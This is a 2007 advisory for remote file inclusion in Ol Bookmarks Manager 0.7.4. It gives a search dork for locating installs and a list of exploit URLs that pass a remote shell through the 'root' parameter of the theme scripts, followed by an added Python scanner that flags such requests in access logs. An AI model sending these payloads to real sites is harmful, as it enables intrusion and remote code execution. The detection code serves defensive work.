# Title : Ol Bookmarks Manager 0.7.4 (root) Remote File Inclusion Vulnerabilities
# Published : 2007-05-21
# Author : ThE TiGeR
#Olbookmarks =>0.7.4 multiple RFI (root)
#Download script : http://mesh.dl.sourceforge.net/sourceforge/olbookmarks/olbookmarks-0.7.4.tar.gz
#D0rk : allintitle:ol'bookmarks
#Thanks Str0ke
#Exploit :
#http://victime.com/olbookmarks-0.7.4/themes/test1.php?root=shell
#http://victime.com/path/themes/blackorange.php?root=shell
#http://victime.com/path/theme/default.php?root=shell
#http://victime.com/path/theme/frames1.php?root=shell
#http://victime.com/path/theme/frames1_top.php?root=shell
#http://victime.com/path/theme/test1.php?root=shell
#http://victime.com/path/theme/test2.php?root=shell
#http://victime.com/path/theme/test3.php?root=shell
#http://victime.com/path/theme/test4.php?root=shell
#http://victime.com/path/theme/test5.php?root=shell
#http://victime.com/path/theme/test6.php?root=shell
#http://victime.com/path/theme/frames1_left.php?root=shell
#http://victime.com/path/theme/frames1_center.php?root=shell
#Discovered by ThE TiGeR
#Miro_Tiger[at]Hotmail[dot]com
# www.Syue.com [2007-05-21]
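
A log check for the requests listed above, as an added example that is not part of the original advisory: it flags access-log lines that hit one of the named theme scripts with a `root` query parameter and marks those whose value points at a remote location. The log format (Combined Log Format), the sample lines, the hosts and the function names are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Theme scripts named in the advisory (listed under both theme/ and themes/).
THEME_FILES = {
    "blackorange.php", "default.php", "frames1.php", "frames1_top.php",
    "frames1_left.php", "frames1_center.php", "test1.php", "test2.php",
    "test3.php", "test4.php", "test5.php", "test6.php",
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that starts with a URL scheme ("http:", "ftp:") or with "//host".
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:|//)", re.I)

def classify(line):
    """Return None, 'root-set' or 'remote-include' for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    parts = url.path.lower().split("/")
    if len(parts) < 2 or parts[-1] not in THEME_FILES:
        return None
    if parts[-2] not in ("theme", "themes"):
        return None
    # parse_qs percent-decodes, so root=http%3A%2F%2F... is caught as well.
    values = parse_qs(url.query, keep_blank_values=True).get("root")
    if values is None:
        return None
    if any(REMOTE_RE.match(v) for v in values):
        return "remote-include"
    return "root-set"

def scan(lines):
    hits = []
    for line in lines:
        verdict = classify(line)
        if verdict:
            hits.append((line.split()[0], verdict))  # (client address, verdict)
    return hits

SAMPLE_LOG = [  # constructed lines, not taken from a real server
    '192.0.2.10 - - [21/May/2007:10:00:01 +0000] "GET /olbookmarks-0.7.4/themes/test1.php?root=http%3A%2F%2Fremote.example%2Fx.txt%3F HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.11 - - [21/May/2007:10:00:05 +0000] "GET /path/theme/default.php?root=shell HTTP/1.0" 200 87 "-" "-"',
    '192.0.2.12 - - [21/May/2007:10:00:09 +0000] "GET /olbookmarks-0.7.4/index.php?root=http://remote.example/x HTTP/1.1" 200 4096 "-" "-"',
    '192.0.2.13 - - [21/May/2007:10:00:12 +0000] "GET /path/theme/frames1_left.php HTTP/1.1" 200 300 "-" "-"',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

An access log records only the query string, so a `root` value sent any other way does not appear in this check.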